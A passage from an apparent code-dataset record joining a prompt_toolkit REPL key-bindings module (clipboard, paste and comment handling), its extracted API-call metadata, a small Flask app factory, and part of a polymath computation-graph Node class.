print(copy_command[0], "error:", e, file=sys.stderr)
def system_paste():
if "Linux" in platform.platform():
paste_command = ['xsel', '-b']
else:
paste_command = ['pbpaste']
try:
# In Python 3.6 we can do this:
# run(paste_command, input=text, encoding='utf-8')
p = subprocess.run(paste_command, stdout=subprocess.PIPE, check=True)
except FileNotFoundError:
print("Error: could not find", paste_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
print(paste_command[0], "error:", e, file=sys.stderr)
return p.stdout.decode('utf-8')
@r.add_binding(Keys.ControlX, Keys.ControlW)
def copy_to_clipboard(event):
if event.current_buffer.document.selection:
from_, to = event.current_buffer.document.selection_range()
run_in_terminal(lambda:system_copy(event.current_buffer.document.text[from_:to + 1]))
@r.add_binding(Keys.ControlX, Keys.ControlY)
def paste_from_clipboard(event):
paste_text_future = run_in_terminal(system_paste)
event.current_buffer.cut_selection()
paste_text_future.add_done_callback(lambda future:\
event.current_buffer.paste_clipboard_data(ClipboardData(future.result())))
# M-[ a b is set to C-S-/ (C-?) in iTerm2 settings
Keys.ControlQuestionmark = "<C-?>"
ALL_KEYS.append("<C-?>")
ANSI_SEQUENCES['\x1b[ab'] = Keys.ControlQuestionmark
Keys.ControlSlash = "<C-/>"
ALL_KEYS.append("<C-/>")
ANSI_SEQUENCES['\x1b"5/'] = Keys.ControlSlash
# This won't work until
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/484 is
# merged.
if prompt_toolkit_version[0] != '3':
@r.add_binding(Keys.ControlQuestionmark, save_before=lambda e: False)
def redo(event):
event.current_buffer.redo()
@r.add_binding(Keys.ControlSlash, save_before=lambda e: False)
def undo(event):
event.current_buffer.undo()
# Need to escape all spaces here because of verbose (x) option below
ps1_prompts = [r'>>>\ '] + [re.escape(i) + r'\[\d+\]:\ ' for i, j in emoji + [emoji_pudb]] + [r'In\ \[\d+\]:\ ']
ps2_prompts = [r'\ *\.\.\.:\ ?', r'\.\.\.\ ?', '\N{CLAPPING HANDS SIGN}+\\ ?⎢\\ ?']
PS1_PROMPTS_RE = re.compile('|'.join(ps1_prompts))
PS2_PROMPTS_RE = re.compile('|'.join(ps2_prompts))
PROMPTED_TEXT_RE = re.compile(r'''(?x) # Multiline and verbose
(?P<prompt>
(?P<ps1prompt>{PS1_PROMPTS_RE.pattern}) # Match prompts at the front
| (?P<ps2prompt>{PS2_PROMPTS_RE.pattern}))? # of the line.
(?P<noprompt>(?(prompt)\r|))? # If the prompt is not
# matched, this is a special
# marker group that will match
# the empty string.
# Otherwise it will not
# match (because all \r's
# have been stripped from
# the string).
(?P<line>.*)\n # The actual line.
'''.format(PS1_PROMPTS_RE=PS1_PROMPTS_RE, PS2_PROMPTS_RE=PS2_PROMPTS_RE))
def prompt_repl(match):
r"""
repl function for re.sub for clearing prompts
Replaces PS1 prompts with \r and removes PS2 prompts.
"""
# TODO: Remove the lines with no prompt
if match.group('ps1prompt') is not None:
return '\r' + match.group('line') + '\n'
elif match.group('ps2prompt') is not None:
return match.group('line') + '\n'
return ''
def split_prompts(text, indent=''):
r"""
Takes text copied from mypython, Python, or IPython session and returns a
list of inputs
Outputs are stripped. If no prompts are found the text is left alone.
The resulting text is indented by indent, except for the first line.
It is assumed that the text contains no carriage returns (\r).
Trailing whitespace and newlines is stripped from the outputs.
Example:
>>> split_prompts('''
... In [1]: a = 1
...
... In [2]: a
... Out[2]: 1
...
... In [3]: def test():
... ...: pass
... ...:
... ''')
['a = 1', 'a', 'def test():\n pass']
"""
from .mypython import validate_text
text = textwrap.dedent(text).strip() + '\n'
text = textwrap.dedent(PROMPTED_TEXT_RE.sub(prompt_repl, text)).lstrip()
lines = text.split('\r')
# Make sure multilines end in two newlines
for i, line in enumerate(lines):
try:
validate_text(line)
except SyntaxError:
# If there is a syntax error, we can't use the CMD_QUEUE (it
# breaks things).
lines = ['\n'.join(lines)]
break
if '\n' in line.rstrip():
lines[i] += '\n'
lines[0] = textwrap.indent(lines[0], indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))
for i in range(1, len(lines)):
lines[i] = textwrap.indent(lines[i], indent)
# Extraneous newlines at the end will be stripped by the prompt anyway.
# This just makes this function easier to test.
lines = [i.rstrip() for i in lines]
return lines
@r.add_binding(Keys.BracketedPaste)
def bracketed_paste(event):
from .mypython import CMD_QUEUE
data = event.data
buffer = event.current_buffer
# Be sure to use \n as line ending.
# This part is the same as the default binding
# Some terminals (Like iTerm2) seem to paste \r\n line endings in a
# bracketed paste. See: https://github.com/ipython/ipython/issues/9737
data = data.replace('\r\n', '\n')
data = data.replace('\r', '\n')
# Replace tabs with four spaces (C-x C-y will still paste the text exactly)
data = data.replace('\t', ' ')
# Strip prompts off pasted text
document = buffer.document
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if not inside_string(event.current_buffer.text, row, col):
indent = LEADING_WHITESPACE.match(document.current_line_before_cursor)
current_line_indent = indent.group(1) if indent else ''
if PS1_PROMPTS_RE.match(data.strip()) or PS2_PROMPTS_RE.match(data.strip()):
lines = split_prompts(data, current_line_indent)
else:
lines = [textwrap.indent(data, current_line_indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))]
else:
lines = [data]
event.current_buffer.insert_text(lines[0])
for text in lines[1:]:
# TODO: Send last chunk as bracketed paste, so it can be edited
CMD_QUEUE.append(text)
if CMD_QUEUE:
accept_line(event)
@r.add_binding(Keys.Escape, ';')
def comment(event):
buffer = event.current_buffer
document = buffer.document
cursor_line, cursor_col = document.translate_index_to_position(document.cursor_position)
if document.selection:
from_, to = document.selection_range()
start_line, start_col = document.translate_index_to_position(from_)
end_line, end_col = document.translate_index_to_position(to - 1)
end_line += 1
else:
start_line = cursor_line
end_line = start_line + 1
# Get the indentation for the comment delimiters
min_indent = float('inf')
for line in document.lines[start_line:end_line]:
if not line.strip():
continue
indent = LEADING_WHITESPACE.search(line)
if indent:
min_indent = min(min_indent, len(indent.group(1)))
else:
min_indent = 0
if min_indent == 0:
break
if min_indent == float('inf'):
min_indent = 0
uncomment = (all(not line.strip() or line[min_indent] == '#' for line in
document.lines[start_line:end_line])
and ''.join(document.lines[start_line:end_line]).strip())
lines = []
for i, line in enumerate(document.lines):
if start_line <= i < end_line:
if uncomment:
lines.append(line[:min_indent] + line[min_indent+2:])
else:
lines.append(line[:min_indent] + '# ' + line[min_indent:])
else:
lines.append(line)
new_text = '\n'.join(lines)
# TODO: Set the cursor position correctly
n_changed = 2*(cursor_line - start_line + 1)
if cursor_line >= end_line - 1:
n_changed -= 2
if uncomment:
buffer.cursor_position -= n_changed
buffer.text = new_text
else:
buffer.text = new_text
buffer.cursor_position += n_changed
@r.add_binding(Keys.ControlX, Keys.ControlE)
def open_in_editor(event):
event.current_buffer.open_in_editor(event.app)
@r.add_binding(Keys.ControlX, Keys.ControlS)
@r.add_binding(Keys.ControlX, Keys.ControlC)
def noop(event):
pass
| [
"prompt_toolkit.key_binding.bindings.named_commands.backward_delete_char",
"re.escape",
"re.compile",
"prompt_toolkit.key_binding.bindings.emacs.load_emacs_search_bindings",
"prompt_toolkit.key_binding.bindings.page_navigation.load_emacs_page_navigation_bindings",
"prompt_toolkit.application.current.get_app",
"textwrap.dedent",
"prompt_toolkit.key_binding.bindings.cpr.load_cpr_bindings",
"prompt_toolkit.keys.ALL_KEYS.append",
"textwrap.indent",
"prompt_toolkit.application.run_in_terminal",
"platform.platform",
"subprocess.run",
"prompt_toolkit.key_binding.KeyBindings",
"prompt_toolkit.key_binding.bindings.named_commands.beginning_of_line",
"prompt_toolkit.key_binding.bindings.named_commands.accept_line",
"prompt_toolkit.key_binding.bindings.mouse.load_mouse_bindings",
"prompt_toolkit.key_binding.bindings.named_commands.self_insert",
"prompt_toolkit.key_binding.bindings.basic.load_basic_bindings",
"prompt_toolkit.key_binding.bindings.emacs.load_emacs_bindings",
"prompt_toolkit.filters.HasSelection"
] | [((1867, 1880), 'prompt_toolkit.key_binding.KeyBindings', 'KeyBindings', ([], {}), '()\n', (1878, 1880), False, 'from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings\n'), ((4468, 4497), 're.compile', 're.compile', (['"""\\\\S *(\\\\n *\\\\n)"""'], {}), "('\\\\S *(\\\\n *\\\\n)')\n", (4478, 4497), False, 'import re\n'), ((5391, 5447), 're.compile', 're.compile', (['"""([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)"""'], {}), "('([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')\n", (5401, 5447), False, 'import re\n'), ((13992, 14024), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<Shift-Enter>"""'], {}), "('<Shift-Enter>')\n", (14007, 14024), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((14652, 14675), 're.compile', 're.compile', (['"""( *)[^ ]?"""'], {}), "('( *)[^ ]?')\n", (14662, 14675), False, 'import re\n'), ((25290, 25314), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-?>"""'], {}), "('<C-?>')\n", (25305, 25314), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((25397, 25421), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-/>"""'], {}), "('<C-/>')\n", (25412, 25421), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((20051, 20075), 'prompt_toolkit.key_binding.bindings.named_commands.beginning_of_line', 'beginning_of_line', (['event'], {}), '(event)\n', (20068, 20075), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((23213, 23231), 'prompt_toolkit.key_binding.bindings.named_commands.self_insert', 'self_insert', (['event'], {}), '(event)\n', (23224, 23231), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((24992, 25021), 'prompt_toolkit.application.run_in_terminal', 'run_in_terminal', (['system_paste'], {}), '(system_paste)\n', (25007, 25021), False, 'from prompt_toolkit.application import run_in_terminal\n'), ((13556, 13574), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (13567, 13574), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((15494, 15521), 'prompt_toolkit.key_binding.bindings.named_commands.backward_delete_char', 'backward_delete_char', (['event'], {}), '(event)\n', (15514, 15521), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((22935, 22949), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (22947, 22949), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((22989, 23003), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23001, 23003), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23108, 23122), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23120, 23122), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23270, 23284), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23282, 23284), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23323, 23337), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23335, 23337), False, 'from prompt_toolkit.filters import 
Condition, HasSelection, is_searching\n'), ((23495, 23514), 'platform.platform', 'platform.platform', ([], {}), '()\n', (23512, 23514), False, 'import platform\n'), ((24059, 24078), 'platform.platform', 'platform.platform', ([], {}), '()\n', (24076, 24078), False, 'import platform\n'), ((24286, 24351), 'subprocess.run', 'subprocess.run', (['paste_command'], {'stdout': 'subprocess.PIPE', 'check': '(True)'}), '(paste_command, stdout=subprocess.PIPE, check=True)\n', (24300, 24351), False, 'import subprocess\n'), ((29068, 29101), 'textwrap.indent', 'textwrap.indent', (['lines[i]', 'indent'], {}), '(lines[i], indent)\n', (29083, 29101), False, 'import textwrap\n'), ((30835, 30853), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (30846, 30853), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((1601, 1622), 'prompt_toolkit.key_binding.bindings.basic.load_basic_bindings', 'load_basic_bindings', ([], {}), '()\n', (1620, 1622), False, 'from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings\n'), ((1633, 1654), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_bindings', 'load_emacs_bindings', ([], {}), '()\n', (1652, 1654), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1664, 1692), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_search_bindings', 'load_emacs_search_bindings', ([], {}), '()\n', (1690, 1692), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1702, 1739), 'prompt_toolkit.key_binding.bindings.page_navigation.load_emacs_page_navigation_bindings', 'load_emacs_page_navigation_bindings', ([], {}), '()\n', (1737, 1739), False, 'from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings\n'), ((1750, 1771), 'prompt_toolkit.key_binding.bindings.mouse.load_mouse_bindings', 'load_mouse_bindings', ([], {}), '()\n', (1769, 1771), False, 'from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings\n'), ((1781, 1800), 'prompt_toolkit.key_binding.bindings.cpr.load_cpr_bindings', 'load_cpr_bindings', ([], {}), '()\n', (1798, 1800), False, 'from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings\n'), ((12687, 12705), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12698, 12705), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((12873, 12891), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12884, 12891), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((11679, 11688), 'prompt_toolkit.application.current.get_app', 'get_app', ([], {}), '()\n', (11686, 11688), False, 'from prompt_toolkit.application.current import get_app\n'), ((25967, 25979), 're.escape', 're.escape', (['i'], {}), '(i)\n', (25976, 25979), False, 'import re\n'), ((28323, 28344), 'textwrap.dedent', 'textwrap.dedent', (['text'], {}), '(text)\n', (28338, 28344), False, 'import textwrap\n')] |
# Package initialization module
from config import Config
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# Database access object
db = SQLAlchemy()
# Application factory
def create_app():
    # Flask application object
app = Flask(__name__)
    # Load and apply settings from the config file
app.config.from_object(Config)
    # Initialize the database
db.init_app(app)
    # Employee management subsystem
    from app.view import employee
    # Position management subsystem
    from app.view import post
    # Department management subsystem
    from app.view import department
    # Salary management subsystem
    from app.view import salary
    # Attendance management subsystem
    from app.view import attendance
    # Register the blueprints as the unified external interface
app.register_blueprint(employee)
app.register_blueprint(post)
app.register_blueprint(department)
app.register_blueprint(salary)
app.register_blueprint(attendance)
return app
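# Minimal usage sketch (assuming a separate run script; the module path and
# debug flag below are illustrative, not part of this package):
#
#     from app import create_app
#     app = create_app()
#     app.run(debug=True)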
| [
"flask_sqlalchemy.SQLAlchemy",
"flask.Flask"
] | [((114, 126), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (124, 126), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((181, 196), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (186, 196), False, 'from flask import Flask\n')] |
import os
import itertools
import importlib
import numpy as np
import random
STRATEGY_FOLDER = "exampleStrats"
RESULTS_FILE = "results.txt"
pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you do play i, and your opponent does play j.
moveLabels = ["D","C"]
# D = defect, betray, sabotage, free-ride, etc.
# C = cooperate, stay silent, comply, upload files, etc.
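# Worked example of the payoff matrix above: if we defect (D = 0) while the
# opponent cooperates (C = 1), we score pointsArray[0][1] == 5 and they score
# pointsArray[1][0] == 0; mutual cooperation pays pointsArray[1][1] == 3 each,
# and mutual defection pays pointsArray[0][0] == 1 each.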
# Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent)
# The second axis is which turn. (0 = first turn, 1 = next turn, etc.
# For example, it might return
#
# [[0 0 1] a.k.a. D D C
# [1 1 1]] a.k.a. C C C
#
# if there have been 3 turns, and we have defected twice then cooperated once,
# and our opponent has cooperated all three times.
def getVisibleHistory(history, player, turn):
historySoFar = history[:,:turn].copy()
if player == 1:
historySoFar = np.flip(historySoFar,0)
return historySoFar
def runRound(pair):
moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0])
moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1])
memoryA = None
memoryB = None
    LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 200 turns long. The np.log here guarantees that every turn after the 200th has an equal (low) chance of being the final turn.
history = np.zeros((2,LENGTH_OF_GAME),dtype=int)
for turn in range(LENGTH_OF_GAME):
playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA)
playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB)
history[0,turn] = playerAmove
history[1,turn] = playerBmove
return history
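# Sketch of the strategy interface runRound expects from each module in
# STRATEGY_FOLDER (an illustrative always-cooperate strategy, not one of the
# bundled ones):
#
#     def strategy(history, memory):
#         # history: 2-by-n array, row 0 = our past moves, row 1 = opponent's
#         # memory: whatever state we returned on the previous turn (None at first)
#         return 1, memory   # 1 = cooperate, 0 = defect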
def tallyRoundScores(history):
scoreA = 0
scoreB = 0
ROUND_LENGTH = history.shape[1]
for turn in range(ROUND_LENGTH):
playerAmove = history[0,turn]
playerBmove = history[1,turn]
scoreA += pointsArray[playerAmove][playerBmove]
scoreB += pointsArray[playerBmove][playerAmove]
return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH
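# Worked example: for the 3-turn history [[0,0,1],[1,1,1]] shown above, player A
# scores 5+5+3 = 13 and player B scores 0+0+3 = 3, so tallyRoundScores returns
# the per-turn averages (13/3, 3/3) ~= (4.33, 1.0).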
def outputRoundResults(f, pair, roundHistory, scoresA, scoresB):
f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n")
for p in range(2):
for t in range(roundHistory.shape[1]):
move = roundHistory[p,t]
f.write(moveLabels[move]+" ")
f.write("\n")
f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n")
f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n")
f.write("\n")
def pad(stri, leng):
result = stri
for i in range(len(stri),leng):
result = result+" "
return result
def runFullPairingTournament(inFolder, outFile):
print("Starting tournament, reading files from "+inFolder)
scoreKeeper = {}
STRATEGY_LIST = []
for file in os.listdir(inFolder):
if file.endswith(".py"):
STRATEGY_LIST.append(file[:-3])
for strategy in STRATEGY_LIST:
scoreKeeper[strategy] = 0
f = open(outFile,"w+")
for pair in itertools.combinations(STRATEGY_LIST, r=2):
roundHistory = runRound(pair)
scoresA, scoresB = tallyRoundScores(roundHistory)
outputRoundResults(f, pair, roundHistory, scoresA, scoresB)
scoreKeeper[pair[0]] += scoresA
scoreKeeper[pair[1]] += scoresB
scoresNumpy = np.zeros(len(scoreKeeper))
for i in range(len(STRATEGY_LIST)):
scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]]
rankings = np.argsort(scoresNumpy)
f.write("\n\nTOTAL SCORES\n")
for rank in range(len(STRATEGY_LIST)):
i = rankings[-1-rank]
score = scoresNumpy[i]
scorePer = score/(len(STRATEGY_LIST)-1)
f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n")
f.flush()
f.close()
print("Done with everything! Results file written to "+RESULTS_FILE)
runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
| [
"numpy.flip",
"os.listdir",
"importlib.import_module",
"itertools.combinations",
"numpy.argsort",
"numpy.zeros",
"random.random"
] | [((1069, 1125), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[0])"], {}), "(STRATEGY_FOLDER + '.' + pair[0])\n", (1092, 1125), False, 'import importlib\n'), ((1137, 1193), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[1])"], {}), "(STRATEGY_FOLDER + '.' + pair[1])\n", (1160, 1193), False, 'import importlib\n'), ((1462, 1502), 'numpy.zeros', 'np.zeros', (['(2, LENGTH_OF_GAME)'], {'dtype': 'int'}), '((2, LENGTH_OF_GAME), dtype=int)\n', (1470, 1502), True, 'import numpy as np\n'), ((2994, 3014), 'os.listdir', 'os.listdir', (['inFolder'], {}), '(inFolder)\n', (3004, 3014), False, 'import os\n'), ((3249, 3291), 'itertools.combinations', 'itertools.combinations', (['STRATEGY_LIST'], {'r': '(2)'}), '(STRATEGY_LIST, r=2)\n', (3271, 3291), False, 'import itertools\n'), ((3711, 3734), 'numpy.argsort', 'np.argsort', (['scoresNumpy'], {}), '(scoresNumpy)\n', (3721, 3734), True, 'import numpy as np\n'), ((982, 1006), 'numpy.flip', 'np.flip', (['historySoFar', '(0)'], {}), '(historySoFar, 0)\n', (989, 1006), True, 'import numpy as np\n'), ((1276, 1291), 'random.random', 'random.random', ([], {}), '()\n', (1289, 1291), False, 'import random\n')] |
from polymath import UNSET_SHAPE, DEFAULT_SHAPES
import builtins
import operator
from collections import OrderedDict, deque
from collections.abc import Mapping, Sequence
import functools
from numbers import Integral, Rational, Real
import contextlib
import traceback
import uuid
import numpy as np
import importlib
from .graph import Graph
from .domain import Domain
from .util import _noop_callback, _flatten_iterable, node_hash, \
_is_node_type_instance, is_iterable
class Node(object):
"""
Base class for nodes.
Parameters
----------
args : tuple
Positional arguments passed to the `_evaluate` method.
name : str or None
Name of the node or `None` to use a random, unique identifier.
shape : tuple or None
Shape of the output for a node. This can be a tuple of integers or parameter node names.
graph : Node or None
Parent graph of this node. If graph is `None`, this is the top-level graph.
op_name : str
Operation name which describes the node functionality.
value : Any or None
If a node has a default value to use for execution, it can be set using `value`.
kwargs : dict
Keyword arguments passed to the `_evaluate` method.
"""
_graph_stack = deque([None])
_eval_stack = []
stack_size = 5
evaluated_nodes = 0
def __init__(self, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
self.nodes = Graph()
self.value = value
self.dependencies = []
self._args = []
        self._predecessors = []
        self._successors = []
self.args = args
if "name" in kwargs:
kwargs.pop("name")
self.added_attrs = []
        # TODO: Change this to an underscore-prefixed private variable
self.kwargs = kwargs
self.graph = graph
self._shape = OrderedDict()
self.shape = shape or tuple([])
# Get a list of all dependencies relevant to this node
self.dependencies = [] if dependencies is None else dependencies
if self.graph:
self.dependencies.extend(self.graph.dependencies)
# Choose a name for the node and add the node to the graph
self._name = None
self.name = name or uuid.uuid4().hex
self._op_name = None
self.op_name = op_name
# Get the stack context so we can report where the node was defined
self._stack = traceback.extract_stack(limit=1)
@property
def graph(self):
"""
polymath.srdfg.graph.Graph : Parent graph of this node. If graph is `None`, this is the top-level graph.
"""
return self._graph
    def preds(self):
        return self._predecessors
    def succs(self):
        return self._successors
def add_predecessor(self, pred):
if isinstance(pred, Node):
self._predecessors.append(pred.gname)
else:
self._predecessors.append(pred)
    def add_successor(self, succ):
        if isinstance(succ, Node):
            self._successors.append(succ.gname)
        else:
            self._successors.append(succ)
def set_edges(self):
for e in self.args:
self.add_predecessor(e)
if isinstance(e, Node):
e.add_successor(self)
@property
def domain(self):
return Domain(tuple([]))
@property
def args(self):
"""
tuple : Positional arguments which are used for executing this node.
"""
return tuple(self._args)
@property
def argnames(self):
return [a.name if isinstance(a, Node) else a for a in self.args]
@property
def shape(self):
"""
tuple : Shape of the output for a node. This can be a tuple of integers or parameter node names.
"""
return self._shape
@property
def var(self):
return self
@property
def name(self):
"""str : Unique name of the node"""
return self._name
@property
def op_name(self):
"""
str : Operation name which describes the node functionality.
"""
return self._op_name
@op_name.setter
def op_name(self, op_name):
if op_name:
self._op_name = op_name
elif self.__class__.__name__ == "Node":
self._op_name = self.name
else:
self._op_name = self.__class__.__name__
@name.setter
def name(self, name):
self.set_name(name)
@args.setter
def args(self, args):
new_args = []
for arg in args:
if isinstance(arg, Node):
if self.__class__.__name__ == "Node":
self.nodes[arg.name] = self.graph[arg.name]
new_args.append(arg)
self._args = tuple(new_args)
@shape.setter
def shape(self, shape):
self.set_shape(shape, init=True)
@graph.setter
def graph(self, graph):
self._graph = Node.get_active_graph(graph)
@property
def gname(self):
scope_names = [self.name]
cgraph = self.graph
while cgraph:
scope_names.append(cgraph.name)
cgraph = cgraph.graph
return "/".join(list(reversed(scope_names)))
def __enter__(self):
Node._graph_stack.append(self)
return self
def __exit__(self, *args):
assert self == Node._graph_stack.pop()
def __repr__(self):
return "<node '%s'>" % self.name
def add_attribute(self, key, value):
self.added_attrs.append(key)
self.kwargs[key] = value
def is_shape_finalized(self):
if self.shape == UNSET_SHAPE:
return False
for s in self.shape:
if not isinstance(s, Integral):
return False
return True
def set_shape(self, shape=None, init=False):
if isinstance(shape, float):
            self._shape = tuple([int(shape)])
elif isinstance(shape, Integral):
self._shape = tuple([shape])
elif isinstance(shape, Node):
self._shape = tuple([shape])
elif not shape or len(shape) == 0:
# TODO: Change in order to enable "is shape finalized" to work
self._shape = UNSET_SHAPE
else:
shapes = []
for dim in shape:
if isinstance(dim, (Node, Integral)):
shapes.append(dim)
elif isinstance(dim, float):
shapes.append(int(dim))
else:
raise TypeError(f"Shape value must be placeholder or integer value for {self.name}\n"
f"\tDim: {dim}"
f"\n\t{self.kwargs} ")
self._shape = tuple(shapes)
@staticmethod
def get_active_graph(graph=None):
"""
Obtain the currently active graph instance by returning the explicitly given graph or using
the default graph.
Parameters
----------
graph : Node or None
Graph to return or `None` to use the default graph.
Raises
------
ValueError
If no `Graph` instance can be obtained.
"""
graph = graph or Node._graph_stack[-1]
return graph
def instantiate_node(self, node): # pylint:disable=W0621
"""
Instantiate nodes by retrieving the node object associated with the node name.
Parameters
----------
node : Node or str
            Node instance or name of a node.
Returns
-------
instantiated_node : Node
Node instance.
Raises
------
ValueError
            If `node` is not a `Node` instance or a node name.
RuntimeError
If `node` is an `Node` instance but does not belong to this graph.
"""
if isinstance(node, str):
return self.nodes[node]
if isinstance(node, Node):
if node.name not in self.nodes and (node.graph != self):
raise RuntimeError(f"node '{node}' does not belong to {self} graph, instead belongs to"
f" {node.graph}")
return node
raise ValueError(f"'{node}' is not an `Node` instance or node name")
def instantiate_graph(self, context, **kwargs):
"""
Instantiate a graph by replacing all node names with node instances.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
context : dict[Node or str, object]
Context whose keys are node instances or names.
kwargs : dict[str, object]
Additional context information keyed by variable name.
Returns
-------
normalized_context : dict[Node, object]
Normalized context whose keys are node instances.
Raises
------
ValueError
If the context specifies more than one value for any node.
ValueError
If `context` is not a mapping.
"""
if context is None:
context = {}
elif not isinstance(context, Mapping):
raise ValueError("`context` must be a mapping.")
nodes = list(context)
# Add the keyword arguments
for node in nodes: # pylint:disable=W0621
value = context.pop(node)
node = self.instantiate_node(node)
if node in context:
raise ValueError(f"duplicate unequal value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
for name, value in kwargs.items():
node = self.nodes[name]
if node in context:
raise ValueError(f"duplicate value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
return context
def run(self, fetches, context=None, *, callback=None, **kwargs):
"""
Evaluate one or more nodes given a dictionary of node names with their values.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
fetches : list[str or Node] or str or Node
One or more `Node` instances or names to evaluate.
context : dict or None
Context in which to evaluate the nodes.
callback : callable or None
            Callback to be evaluated when a node is evaluated.
kwargs : dict
Additional context information keyed by variable name.
Returns
-------
values : Node or tuple[object]
Output of the nodes given the context.
Raises
------
ValueError
            If `fetches` is not a `Node` instance, node name, or a sequence thereof.
"""
if isinstance(fetches, (str, Node)):
fetches = [fetches]
single = True
elif isinstance(fetches, Sequence):
single = False
else:
raise ValueError("`fetches` must be an `Node` instance, node name, or a "
"sequence thereof.")
fetches = [self.instantiate_node(node) for node in fetches]
context = self.instantiate_graph(context, **kwargs)
for c in context:
if c in fetches and c.op_name in ["output", "state", "temp"]:
write_name = "/".join([f"{i}{c.write_count-1}" for i in c.name.split("/")]) if c.write_count > 0 else c.name
fetches[fetches.index(c)] = c.graph.nodes[write_name]
values = [fetch.evaluate_node(fetch, context, callback=callback) for fetch in fetches]
return values[0] if single else tuple(values)
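    # Rough usage sketch for `run` (hypothetical node names; `placeholder` is
    # one of the helpers referenced elsewhere in this package):
    #
    #     with Node(name="main") as graph:
    #         a = placeholder("a")
    #         b = placeholder("b")
    #         c = (a + b).set_name("c")
    #     graph.run("c", {"a": 2, "b": 3})   # -> 5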
def __getstate__(self):
return self.__dict__
def __setstate__(self, data):
self.__dict__.update(data)
def set_name(self, name):
"""
Set the name of the node and update the graph.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
